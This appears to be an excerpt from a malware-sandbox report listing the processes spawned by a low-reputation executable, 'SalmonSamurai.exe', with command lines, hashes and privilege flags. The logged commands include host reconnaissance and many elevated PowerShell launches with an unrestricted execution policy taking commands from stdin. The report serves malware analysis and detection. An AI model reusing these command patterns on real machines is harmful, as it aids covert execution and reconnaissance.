                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\SalmonSamurai.exe"
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              File size:74'023'200 bytes
                                                                                                                                                                                                                                              MD5 hash:4CE4A1F912D0B9840A7F568454C6C45A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                              Start time:12:24:25
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              Imagebase:0x7ff752ef0000
                                                                                                                                                                                                                                              File size:160'143'360 bytes
                                                                                                                                                                                                                                              MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /d /s /c "chcp"
                                                                                                                                                                                                                                              Imagebase:0x7ff6d8bd0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:chcp
                                                                                                                                                                                                                                              Imagebase:0x7ff7edd20000
                                                                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
                                                                                                                                                                                                                                              Imagebase:0x7ff6d8bd0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                              Start time:12:24:27
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                              Start time:12:24:28
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                                                                                                                                                                              Imagebase:0x7ff752ef0000
                                                                                                                                                                                                                                              File size:160'143'360 bytes
                                                                                                                                                                                                                                              MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                              Start time:12:24:34
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2076 --field-trial-handle=1880,i,15145349905325196454,8933157076268643117,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                                                                                                                                                                              Imagebase:0x7ff752ef0000
                                                                                                                                                                                                                                              File size:160'143'360 bytes
                                                                                                                                                                                                                                              MD5 hash:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                              Start time:12:24:46
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
                                                                                                                                                                                                                                              Imagebase:0x7ff6d8bd0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                              Start time:12:24:46
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                              Start time:12:24:46
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
                                                                                                                                                                                                                                              Imagebase:0x7ff68d280000
                                                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                              Start time:12:24:47
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                              Start time:12:24:53
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
                                                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                              Start time:12:24:53
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                              File size:862'208 bytes
